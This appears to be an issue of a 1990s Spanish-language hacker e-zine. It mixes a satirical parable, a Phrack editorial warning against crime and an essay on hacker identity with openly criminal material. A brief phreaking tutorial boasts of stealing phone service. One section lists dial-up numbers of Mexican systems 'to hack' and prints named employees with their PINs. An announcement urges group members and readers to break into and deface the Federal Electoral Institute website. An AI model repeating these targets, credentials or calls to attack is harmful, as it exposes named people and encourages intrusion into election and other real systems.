vuelve al trabajo." "Pero viene lo mejor: a orillas de la ciudad el estado posee una casita habitada por usted - ahi lo espera su bella esposa y camaraditas." "La cena esta lista: platillos aconsejados por el comisariado de alimentos; ¡QUE DELICIA! - Su suegra, que es miembro de la policia secreta, esta a la mesa." "No hay nada como la vida familiar en el socialismo.- El estado es jefe de la casa y lo releva a usted de problemas.- y ahora, una sorpresa: ¡LA TELEVISION SOCIALISTA!" "La television comunista tambien sustituye al cerebro, pero en forma mas definitiva.- Sabemos que el pensar hace infeliz al hombre y aqui lo queremos feliz a fuerzas." "Si la television occidental vende muchos productos, la television nuestra vende solo uno: COMUNISMO.- Esto parece aburrido, pero no lo es..." "Aqui no aconsejamos que cigarrillos fumar, sino que actitud debe tomar ante la vida.- Y eso es mejor; ahorra esfuerzos..." "Nuestro camino a la dicha esta lleno de satisfacciones; luchar por el Estado, trabajar para el Estado, hacer politica y ser el Estado..." "Cambiar de opio a los pueblos, conquistar el espacio, emancipar a las masas." "El comunismo emancipo al proletariado, que antes era mayoria, conviertiendolo en minoria dirigente, por eso esta es 'La Dictadura del Proletariado'." "De acuerdo con nuestro plan, usted paga AL CONTADO y se olvida de preocupaciones economicas - Y los beneficios los recibe a plazos...en 20 años.- Con justicia social el comunismo alcanzara en comodidades a occidente en ese plazo...¿Acepta Usted?" El hermitaño penso: "Y por medio del capitalismo occidente piensa alcanzar al comunismo en justicia social...tambien en veinte años.".- Hubo un silencio y luego, dirigiendose a ambos, dijo: "Lo siento, NO puedo aceptar ninguna de las dos ofertas." "Sus sistemas han sido diseñados para el hombre ordinario y creo que los dos cometen un error: El hombre ordinario NO EXISTE.- Todos somos diferentes." "Por ejemplo, yo vivo solitario por que me gusta; no encuentro placer en la civilizacion que me ofrecen, no me importan ni el baño ni la ropa..." "Parezco ser el mas pobre de los pobres, pero no busco un empleo, ni un salario, ni un jefe...tengo menos que nadie, comunistas y occidentales, pero tengo mas independencia que ambos..." "No quiero pagar por una casita a plazos ni quiero que el Estado la pague por mi.- Esto parece extraño, pues representa el sueño de todo Burgues y, en una u otra forma, los dos sistemas aspiran a la Burguesia..." "Pero mi ejemplo solo prueba que TODOS los hombres somos diferentes." "Y para finalizar, les dire que la felicidad que me ofrecen yo ya la consegui -; Por ella no pague nada, ni al contado ni a plazos.- Solamente QUISE ser feliz...y lo SOY." Aqui termina esta historia, aunque hay quien dice que ahora, en lo alto de las montañas, no hay un anacoreta, sino tres: HOMERO ROA, ELMER ZIG Y FEDOR ZAG. [ Este texto muestra una parte del espiritu de RareGaZz ] [ Educar - Fomentar el razonamiento - Crear ] ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] **************************** * phreaking * * tutorial * *********************** ¿Que es Phreaking? ------------------ Phreaking es cuando le robas dinero a la compañia telefonica para hacer llamadas de larga distancia o locales gratis. Esto puede ser hecho de distintas maneras. Phreaking es 100% ilegal pero eso nunca nos ha detenido. Como haces phreak? ------------------ Existen 3 formas de joder a las compañias telefonicas: 1. Cajas de colores (azul, purpura, etc.) 2. Usando at&t, mci, etc. sin pagar. 3. "Trucos del negocio" Cajas de colores ---------------- Un boton de pulso trabaja por que emite tonos de distintas frecuencias. Cambiando las frecuencias puedes hacer cosas interesantes. Los phreaks que han estado haciendo esto tienen aparatos llamados 'cajas'. Aqui hay una descripcion breve de algunas... Tipo de Caja ------------ color funcion ~~~~~ ~~~~~~~ azul Todas las llamadas por el precio de una local. purpura Todas las llamadas gratis! plateada Llamadas gratis,etc. La armada de EUA las usa. Caja de sonidos Hace los sonidos de cuando las monedas caen al telefono. Caja que queso Hace las llamadas imposibles de localizar. [ Texto enviado a nosotros por alguien que lo tradujo Ingles - Español ] ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] ==Phrack Magazine== Volume Seven, Issue Forty-Eight, File 2 of 18 Phrack Editorial ---------------------------------------------------------- Exclusiva de RareGaZz ---------------------------------------------------------- Esta probablemente sea mi ultima editorial aqui en Phrack asi que como ya no estare en el rol de editor, se me ocurrio que terminare con mi crusada de hacer enojar al mundo entero. No me gusta ninguno de ustedes gente. La subcultura del hacking se ha convertido en un chiste de lo que fue. La gente puede argumentar que la comunidad ha "evolucionado" o "crecido" de alguna manera, pero eso es pura basura. La comunidad ha degenerado. Se ha convertido en una fuerza alimentada por los medios de comunicacion. El acto de desafio intelectual que representaba el hacking ha sido reemplazado por codicia, ganas de reconocimiento y mal-acomodado por post-adolescentes. DefCon IV epitomizo este cambio con un sorprendente detalle, que solo puedo tener esperanzas de ponerlo en palabras correctamente. Imagina el bastardo offspring de Lollapalooza y una convencion Star Trek. Imagina 300+ gentes fuera de sus casas, lejos del ojo guardian de sus madres por primera vez en sus pateticas vidas. Imagina esa misma gente con el ego de Rush Limbaugh y las habilidades sociales de Jeffrey Dahmer, equipados con laptops con programas que ellos no pueden usar, y hablando con reporteros de tecnicas que ellos mismos no entienden. Bienvenido a DefCon. Si yo tuviera que juzgar a la comunidad de hackers por los resultados de esta conferencia, mi prognosys seria "Terminantemente enferma". Pareceria que "hacking" sea convertido en el siguiente paso logico para mucha gente buscando algo con que vengarze de "algo". "Bien, gee, Ya me he agujerado todas las partes de mi cuerpo y pintado el pelo color azul...¿que mas podria hacer para impactar a mis padres? ¡Ya Se! Voy a meterme a algun sistema federal y quizas ponga mi nombre en el periodico ¡THAT WOULD BE COOL! ¡Sera como la pelicula!" Odio tronar la burbuja de todos, pero estan jodidos. En estos dias, realmente no tienes que hacer nada ilegal para ser un hacker. Esta al alcance de cualquiera aprender mas, y usar computadoras mas poderosas legalmente que nosotros en los 70's y 80's algun dia soñamos. En esos tiempos, era TODO sobre entender como usar estas cosas locas llamadas computadoras. Habian cientos de diferentes tipos de sistemas, cientos de diferentes redes, y todos empezaban desde cero. No habia ningun medio publico de acceso a la informacion; no habia libros en tiendas o gabinetes de librerias con arcanos comandos y sintaxes; no habia clases para las personas civiles. Estabamos fuera. Afrontados con estos obstaculos, jovenes normales, inteligentes, avidos de conocimiento intentaron ganar acceso a estas fascinantes maquinas a traves de cualquier medio posible. Simplemente no habia otra forma. No habia leyes, y a pesar de eso todos sabiamos que tenia algo grotesco. Este hecho añadio un simple 'rush' al break-in (ataque), pero el objetivo principal era simplemente aprender. Ahora, con la mayoria de los sistemas operativos basados en UNIX, y la mayoria de las redes siendo basadas TCP/IP la cantidad de conocimientos necesaria para un hacker ha disminuido notablemente. Con los increiblemente bajos precios de las computadoras caseras, y la libre disposicion de complejos sistemas, la necesidad de break-in en sistemas remotos en orden de aprender ha sido removida. Ahora los unicos incentivos podrian ser vender la informacion robada, el rush sicologico que se experimente al tener el control de un sistema y salirse con la suya. Buscar metas mas altas en el caso de entrar a sistemas, ahora solo nos lleva a la carcel. No hay nada absolutamente cool en ir a la carcel. Conozco a demasiada gente que esta en la carcel, que han estado en la carcel, y algunos que estan a punto de terminar en ella. Confien en mi cuando digo esto gente. No seras respetado por nadie si actuas por las simples emociones y terminas en la carcel. De hecho todos tus "amigos" pensaran que eres un tonto por ser tan descuidado...hasta que ellos tambien sean capturados. Te detienen y seguramente pasaras algun tiempo en la carcel. A pesar de que te liberen, perderas tu pasaporte y tu habilidad de viajar libremente, perderas la habilidad de hacer negocios en ambientes clasificados, no podras ser empleado por la mayoria de las compañias y hasta perderas tus derechos de usar computadoras o equipo de red por años. ¿Aun vale la pena? La recompensa ha disminuido y los riesgos han aumentado. Hacking no es acerca de cometer un crimen. No necesitas ser criminal para ser un hacker. Andar con hackers no te hara un hacker asi como andar con doctores en un hospital te hace doctor. Usar camisetas de hackers no significa que aumentaras tu inteligencia o posicion social. Ser cool no significa tratar a todos como mierda, o pretender que sabes mas que los demas. Desde luego, Yo soy un amargo viviendo en el pasado, asi que, ¿Que puedo Yo saber? Erik Bloodaxe ~~~~~~~~~~~~~ [ Entre musicos, poetas, locos y hackers te veas ... ] ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] ██ ▄██████ ███████ ███████ ██ ██ ▄█████▄ ▄█████▄ ██ ▄██ ██ ██▄▄▄▄ ▐█▌ ▄██▀ ██▄▄▄██ ██▄▄▄██ ██ ██▄██▀ ██ ██▀▀▀▀ ▐█▌ ▄██▀ ██▀▀▀██ ██▀▀▀██ ██ ██▀██▄ ███████ ▀██████ ▐█▌ ███████ ██ ██ ██ ██ ▀█████▀ ██ ▀██ ≡ Suplemento Vitaminico ≡ por -= RdK =- Antes de empezar con el texto que nos enviaron para este numero quisiera decirles que el programa creado para encadenar remailers y encriptar los mensajes usando PGP (o sin el) ya esta disponible en la seccion de WareZ de nuestra pagina o sigue el siguiente link. http://www.geocities.com/Baja/4426/REMAIL.ZIP Esta completamente en Español y viene con instrucciones de uso e instalacion. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Numeros de Telefono Para Hackear Ciberneticos y descarriados amigos les tenemos algunos numeros de telefono localizados en 91-800 (gratuita la llamada :-) para que intenten sus dones de hackers y empiecen ¡YA! a hackear sistemas mexicanos. -=Sistema Mexicano SKYTEL=- ~~~~~~~~~~~~~~~~~~~~~~~ 9180025451 Baud Parity Data-Bits Stop-Bits 2400 None 8 1 Username: ????????? Password: ????????? Cuando te conectes a este sistema aparecera CONNECT en tu programa de comunicaciones pero no habra respuesta del sistema. Tienes que enviar algunos breaks y presionar varias teclas hasta que en tu pantalla se muestre el siguiente texto que (segun yo) incluye la clave del login y password. Nota que cuando pasa sobre un nombre tu PC hara un pitido -en teoria- ------------------------------Comienza Output--------------------------------- SE LES RECUERDA AL PERSONAL QUE TENEMOS SERVICIO DE SKYTEL PARA EMERGENCIAS, PARA REQUERIR DICHO SERVICIO. MARCAR 91(800)72-345 LADA SIN COSTO O 7642 MARCACION ABREVIADA CONTESTARA UNA OPERADORA QUE TRABAJA LOS 365 DIAS DE A#O Y SOLICITARA UN # DE PIN LOS CUALES MOSTRAMOS A CONTINUACION: # PIN 548-86-52 ING. DANIEL HERNANDEZ M. # PIN 539-89-40 SR. AGUSTIN AREY C. # PIN 539-89-41 ING. JORGE CHAVEZ C. # PIN 539-89-42 ING. JUAN MANUEL CORTES M. # PIN 539-89-43 ING. ABEL AQUINO V. # PIN 527-41-53 ING. DANIEL FRIAS R. # PIN 527-41-54 ING. RAUL HERNANDEZ L. # PIN 527-41-55 SR. ENRIQUE MARTINEZ RAMOS. # PIN 548-53-58 ING. JOSE LUIS GONZALEZ # PIN 548-92-98 ING. JESUS FERNANDEZ R. # PIN 548-92-99 ING. JOSE LUIS HERNANDEZ M. # PIN 553-32-16 ING. JOSE ANTONIO PITOL Z. # PIN 553-32-17 ING. BRAULIO ALVAREZ H. Username: -------------------------------Fin del Output--------------------------------- -=Telefonos del Noroeste=- ~~~~~~~~~~~~~~~~~~~~~~ 337700 - Tijuana 763301 - Ensenada ?????? - Rosarito ?????? - Mexicali -=Cetys Ensenada=- ~~~~~~~~~~~~~~~~~~ 745300 - Ensenada 745301 - Ensenada 745167 - Ensenada -=Microsoluciones=- 786031 - Ensenada ¡¡¡¡ SE SOLICITAN NUMEROS TELEFONICOS (CARRIERS) PARA ENTRAR A SISTEMAS !!!! MANDANOS EL NUMERO DE TU UNIVERSIDAD, PROOVEDOR DE SERVICIO, ESCUELA, ETC Y EL SCRIPT PARA REALIZAR LA CONEXION (login.cmd) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ┬┬ ┬ ┬ ┌┬──┐ ┬┬──┐ ┬┬──┐ ────┐ ┬┬──┐ ┌─┬┬─┐ ┬┬──┐ ││ │ │ │├──┤ │├─┬┘ │├─ ┌┬──┘ │├─ ││ │├──┘ └┴─┴─┘ ┴┴ ┴ ┴┴ ┴─ ┴┴──┘ └┴─── ┴┴ ┴┴ ┴┴ ftp.cincos.net Directorio: /incoming Lastima, el operador de este servidor se puso una encabronada por todo el WareZ que se estaba intercambiando en su sistema que decidio borrar *TODOS* los programas que estan en su directorio incoming. Ni modo. Los que aprovecharon consiguieron el PcCillin95, Viruscan95, PgpFone, entre otros programas groovys. Si descubren otro servidor donde se intercambie WareZ no dejen de avisarnos! ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] ________________ CTRL + ALT + DEL ~~~~~~~~~~~~~~~~ "Tu linea de comunicacion con el Underground" En esta seccion se incluyen anuncios, sugerencias, preguntas y todo aquello que sale sobrando en alguna de las otras secciones. .............................................................................. ¡IMPORTANTE! CrackSmoker, lider temporal de RdK ha dado la orden a todos los miembros de RdK de intentar hackear el siguiente sistema: http://www.ife.org.mx para que el grupo gane popularidad y nos hagamos conocidos (mas) en toda la republica. Actualmente hay aprox. 50 integrantes de este grupo -la mayoria estudiantes de ciencias computacionales o algo relacionado con Pc's y redes- y todos trataran de hackear este sistema por lo que sera algo que probablemente SI logren. RareGaZz estara atento a modificaciones a ese sistema y les deseamos ¡SUERTE! a todo el grupo para que logren hacer lo que se proponen. Que gane el mejor. RareTrip, KillerBot, Mr.X y LePompeItor trataran de no dejar abajo a los lectores de RareGaZz y haran todo lo posible para ser ellos los que entren y modifiquen ese sistema...imaginen nuestra grafica principal en ese sistema? CrackSmoker -=RdK=- "Preparados para la Guerra y el Terrorismo" RareTrip -=RareDudeZ=- "Give us a system, we would give you the password" [ Para todos los despistados, www.ife.org.mx es la pagina del Instituto Federal Electoral donde se piensan poner los resultados de las elecciones. Nota aparte: Los lectores de esta revista tambien estan invitados a este gran concurso. El ganador recibira popularidad hasta por los FIU! en todo nuestro grupo y (probablemente) el mundo entero. raretrip ] .............................................................................. Anuncia tu BBS en ¡RareGaZz! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Tienes una BBS y deseas ver el numero telefonico anotado en algun byte de esta revista? Pues envianoslo inmediatamente por que en algun proximo numero pondremos a la disposicion de todos la lista de BBS existentes en toda la republica mexicana! Si conoces el numero de alguna BBS mandalo para la publicacion de este articulo. Si tienes una BBS o pagina personal que tenga los numeros mas actuales de RareGaZz escribenos para incluir el numero/URL en todos los numeros de esta revista como 'sitio alternativo para conseguir raregazz' en caso de que Geocities este muy saturado. .............................................................................. -=PIRATEAR RAREGAZZ=- En la revista "Internet World" numero 4 año 3 aparece el articulo "9 consejos para proteger su privacia" muy parecido al articulo que aparecio en RareGaZz tiempo despues con el titulo "Como permanecer Underground" por Killerbot. ¿Les copiamos? ¡NO, Ellos nos piratearon el articulo! Lo hicieron a traves de un editor de otro magazine conocido al cual le enviamos el articulo con el titulo "Privacidad en Internet" para que lo publicara e incluyera nuestra direccion de correo para promocionar la revista. Tiempo despues se nos aviso que no iba a ser publicado lo cual aceptamos y enviamos nuestros sinceros saludos. Pero...¡Sorpresa! Aparece el articulo en otra revista *SIN* la direccion de RareGaZz y ademas mencionando como autor a otra persona. Ni modo :-( Pues bien, hace poco nos escribe un atento señor de Aguascalientes pidiendo permiso para publicar algunos articulos de RareGaZz en el periodico local El Heraldo. El permiso le fue dado y ademas ha sido alentado a hacerlo lo mas seguido posible siempre y cuando incluya una liga a nuestra pagina y/o la direccion de correo electronico de RareGaZz para promover nuestra pagina aun mucho mas. Moraleja: RareGaZz *SI* puede ser pirateado para revistas, periodicos, trabajos de la escuela, etc. siempre y cuando incluyan -POR LO MENOS- la direccion de correo de la revista y seria PREFERIBLE incluir la liga correcta a nuestra pagina. Si alguno de ustedes sabe de un periodico o revista que haya publicado un articulo nuestro sin mencionar a RareGaZz por favor avisen a la editorial (raregazz@bigfoot.com) y el reporte sera pasado inmediatamente a nuestro 'equipo elite de contra-ataque' para que tomen las medidas necesarias en contra de esa publicacion. .............................................................................. -= Concurso de RareGaZz =- El concurso de RareGaZz para ver quien crea la mejor intro o el mejor logo de nuestra revista en arte ASCII/ANSI continua y esperamos la participacion de todos los artistas de ascii/ansi/programacion que esten interesados en un monton de premios que pensamos enviarle al ganador. A la lista de premios se incluyen los siguientes: - Quicktime (version mas nueva) y Quicktime VR para tu navegador. - Netscape Communicator 4.x - Un atractivo broche de Viva Zapata cortesia de KB. - Un libro nuevecito de el maestro Rius. Todo el software, la camiseta, los diskettes y el cargo por paqueteria suman mas o menos el gran total de $250 pesos en premios (y no en bonos del ahorro nacional) para el afortunado ganador. El minimo de participantes para que el concurso se lleve a cabo son 20. Las bases las puedes encontrar en RareGaZz #3 junto con una lista de los otros premios. .............................................................................. ¿ Los links de su pagina los copiaron de la revista LINK ? Algunos -la mayoria- SI. Los links de esa revista nos evitan la molestia de andar poniendo bookmarks a cada sitio que veamos y a ustedes les ahorra una feria :-) asi que ¿ Que hay de Malo ? Obviamente algunos links no los hemos copiado como la liga al sitio de McAfee donde puedes obtener los updates mas nuevos, la liga a los updates de f-prot, entre muchas otras ligas a paginas de hackers, etc. Muchas disculpas si esto le molesta a la editorial de esa revista, para compensarla ahi les va la siguiente SUPER LIGA de este mes (aja..) http://www.link.com.mx (¿contentos?) .............................................................................. ¿ Podemos anunciar productos, servicios, paginas, etc. en RareGaZz ? ¡ SI ! Desde luego tendrian que mocharse con una feria por cada vez que quisieran publicar sus servicios en nuestra revista. Algunos de nuestros lectores nos piden sugerencias de cual es el mejor proovedor de servicio de Internet, la tienda virtual con los mejores precios, etc. Asi que si se anuncian en esta revista de circulacion Nacional/Mundial y dejan una direccion donde los interesados puedan comunicarse con ustedes seguramente les ayudaria mucho a ellos (sin mencionar que ustedes conseguirian clientes). Obviamente no pensamos inundar la revista con anuncios pero uno o dos cada numero no creo dañen a nadie y ademas seria la unica forma en que nosotros podemos ganar dinero de esta revista :-) ¿Interesados? Comuniquense a nuestras direcciones y les diremos como hacer el pago y la cantidad que tendrian que aportar. Si ustedes los lectores tienen algo que decir respecto a esto esperamos sus opiniones. De cualquier forma, espero comprendan. .............................................................................. ¿ Me podrian decir que significa H/P/A/V ? Muchas paginas de hackers tienen esa palabra en sus descripciones y simboliza H acking P hreaking A narchy V irii Servido joven... .............................................................................. ¿ Que buenos libros acerca de Internet me recomiendan leer ? ¡ TODA LA SERIE ARCO-IRIS ! En algunas partes de Internet encontraras los "rainbow books" que son gratuitos e incluyen todo tipo de informacion sobre redes e informatica. Desafortunadamente estos libros estan en Ingles y son un poco dificiles de conseguir. Los libros de la rainbow series fueron escritos por la National Computer Security Center (NCSC) para ayudar a los administradores de sistemas y profesionales a crear sistemas seguros que puedan ser confiados. Algunos que *yo* en lo particular he leido son los siguientes: Dark Lavender= Explica los metodos de distribucion de software para controlar la calidad y evitar que sus contenidos sean modificados. Brown= Esta es la guia para crear un sistema "de confianza" o seguro. N_Orange= Es la guia para comprender el control discrecional del acceso a sistemas seguros. Orange1= Criterios para la evaluacion de un sistema seguro. Orange2= Es un manual para comprender el control de la configuracion de los sistemas seguros. Purpura= La guia para la verificacion formal de los sistemas. Rojo= Criterios para la evaluacion de una red segura y sus componentes. Este mes en nuestra pagina podras obtener el libro Brown en nuestra seccion de WareZ. El mes proximo pondremos otro libro y asi los estaremos rotando para ahorrar espacio en la cuenta de Geocities. Tu puedes coleccionar ( y desde luego, leer ) estos libros para aumentar tu conocimiento en forma MUY considerable -ingles necesario-. ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] Sobre Hackers, Crackers, Elites y LamerZ Por: RareTrip Esto es algo que me siento obligado a decir por la rapida aparicion de supuestos hackers en la red. Ponganse atentos o no lo lean... ¿Ser hacker que es? ¿Es acaso memorizar firmas de algun hacker conocido como 'todos contra el capitalismo' o 'abajo el gran hermano'? ¿Es un hacker el que se niega a compartir informacion? ¿Es un hacker el anti-social escondido en el refugio de su habitacion? Lo siento, pero ese seria mejor catalogado como un Lamer. No quiero decir que una persona que no se sienta confortable con las masas o grandes cantidades de gente sea un lamer (Oh No), al contrario, estas personas han descubierto que lo importante no es andar en la bola sino disfrutar el silencio (depeche mode:-). Tampoco es un lamer aquel que sienta el impulso de crear y el rush de pensar cuando este solo en su habitacion, no me entiendan mal por favor, un lamer es quien esta solo por que no le queda de otra. Una persona sola por conviccion es, para mi, alguien super respetable. Alguien que logro separarse de la sociedad para empezar con algun acto creativo y nuevo es un hacker, un verdadero hacker. Un hacker no quiere ser reconocido en la calle como hacker o anti-social, un hacker quiere -en lo posible- pasar desapercibido para que nadie moleste sus pensamientos. Un hacker con pelo azul y aretes en la nariz no es otra cosa que alguien que necesita ayuda, y pronto. Un lamer es aquel aspirante a hacker que quiere ser hacker sin esforzarse en absoluto. Un lamer no aspira a tener filosofia propia y se conforma con chupar toda una forma de pensar y actuar de algun super-hacker al que admire. Un lamer si no tuviera computadora se conformaria con ver television todo el dia para despues, aspirar a ser un Batman, Superman o cualquier otro caracter ficticio pensando que solo necesita la capa para volar. ¿Sabes quien es RareTrip? Para aquellos que me confundan con un señor de 40 años o un niño de 15 dejenme decirles que raretrip -al contrario de la persona que lo ha creado- no tiene edad, no tiene sexo, y tampoco tiene nacionalidad; es tan solo un IDEAL de alguna persona que trata de proyectarlo bajo un pseudonimo para hacer un sketch de alguien que quisiera ser. Yo, la persona y ser viviente que creo a raretrip no salgo a la calle vestido como hacker y con una camiseta con mi handle en letras grandes. Raretrip permanece guardado en mi cabeza mientras vivo la parte de mi persona humana, cuando regreso en frente de mi computadora...raretrip aparece de nuevo. Todos nosotros tenemos un ideal maximo o algo que nos gustaria llegar a ser; pues para mi es raretrip. Por eso le doy vida y moldeo sus ideas. No para hacerme elite o mejor. No pienso mejorar mi personalidad simplemente por ser raretrip, ni tampoco ganar mas amigos por que ya soy elite. Es como el nerdo que nunca tuvo amigos hasta que se quito los lentes...asi son los nuevos hackers. Asi nunca he tratado de ser yo. A todos ustedes les recomiendo esto: -Olviden su handle en su vida cotidiana.- No seamos hackers para hacernos famosos, no queremos ganar popularidad o fama siendo hackers. Eso si, queremos ganar conocimiento - y claro, chicas guapas :-) - -Tengan su vida aparte de la de su handle.- Algunas personas se asombran de lo bien informado que estoy pero eso tiene una simple explicacion "No siempre soy raretrip". Crees tu que si llego con alguien desconocido diciendo 'hola, soy el editor de raregazz y miembro de RdK' me tratarian mejor que si dijera 'hola, soy paco-gerte, me gustan las computadoras y siento simpatia por las redes'. Ni por un momento. La gente tiende a rechazarte si piensan que sabes mas que ellos, por eso olvida tu handle y ten tu verdadera personalidad a mano. Entre mas personas conozcas usando tu verdadera identidad mas informacion podras usar para tu handle, en mi caso, raretrip. -No se vendan a nadie.- Nunca copien las actitudes de ninguna persona, aqui en raregazz nos podremos ver como las personas mas keewwl de i-net pero te aseguro que si me vez en la calle no voltearias a verme, y seguramente yo no voltearia a verte. Como te estas dando cuenta la imagen que tienes de mi es por mis ideas y forma de pensar, no por ser elite o hacker. No quiero ser heroe o enemigo de nadie simplemente por mi handle. Yo conosco por fortuna a dos de mis mejores compañeros de hacking, pero no siempre es asi. Si no conoces a los hackers con los que usualmente hablas por email -creeme- es mejor. LePompeItor ha sido amigo mio desde hace tiempo, entre los dos hemos hecho desmadre en borracheras y loqueras que solo nosotros podemos llegar recordar, por eso hay aqui en raregazz un ambiente de camaderia y no de competencia. Estan invitados a formar parte de este ambiente todos los que quieran, no necesitan ser filosofos o expertos en hacking, simplemente GANAS -MUCHAS GANAS- de aprender y estar atentos... Espero a alguno de ustedes le sirva este pequeño texto que inclui en este numero sin avisarle a nadie. Creo es necesario que aparezcan hackers con ideas propias, con inventiva, con ganas de buscar y aprender. No solo aquellos que busquen 'recetas de cocina' para hacer esto o aquello. Las personas que buscan ese tipo de recetas son, para mi, los lamerz. RareTrip@Cyberdude.com "If it moves, kiss it!" ..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[].. ==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──==──== []..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[] Hasta la proxima! Enjoy the sunrise, tomorrow may not be there... ! Editor: RareTrip -$- Colaboradores: LePompeItor, Mr.X, KillerBot, ! * CrackSmoker y Psycho Tranze. + /^ | Perdedores: Kasparov. ! | |//^ _^_ De moda: Deep Blue. /^ / @ | /_-_ Agradecimientos: (ver abajo) |@ _| @ @|- - -| Nuestro odio: (ver arriba) | | | /^ | _ | Wired: RareGaZz |___/____|_|_|_(_)_| Tired: PcComputing, PcMagaZine, Link, Internet World, PcMedia, etc. Comentario: Nihil obstat & non plus ultra. <<::RareGaZz::>> "El Abogado del Diablo"